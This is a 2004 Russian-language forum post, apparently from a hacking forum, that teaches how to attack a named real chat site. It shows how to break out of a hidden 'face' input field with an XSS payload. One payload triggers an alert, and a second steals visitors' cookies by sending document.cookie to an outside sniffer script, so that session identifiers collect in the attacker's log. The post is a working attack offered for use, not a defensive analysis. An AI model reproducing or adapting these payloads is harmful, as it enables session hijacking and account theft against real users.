Тема: Научите пожалуйста
Показать сообщение отдельно

  #14  
Старый 11.08.2004, 20:07
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
С нами: 11540434

Репутация: 82
По умолчанию
на http://chat.bratsk.ru есть форма входа

там есть поле
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><input name=face type=hidden value="1">[/QUOTE]<span id='postcolor'>
оно типа ваше лицо обозначает
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><img src="/images/1.gif" ...>[/QUOTE]<span id='postcolor'>

если запихнуть в это поле
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">" onError="alert(/ Чат поимели /)" z="[/QUOTE]<span id='postcolor'>

то после отсылке первогоже сообщения от вас, все будут любоваться мессагой

аналогично будем поступать со снифером
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">1.gif" onLoad="x=new Image();x.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;" z="[/QUOTE]<span id='postcolor'>

после входа и отправке сообщения
весь лог заполняется идентификаторами сессий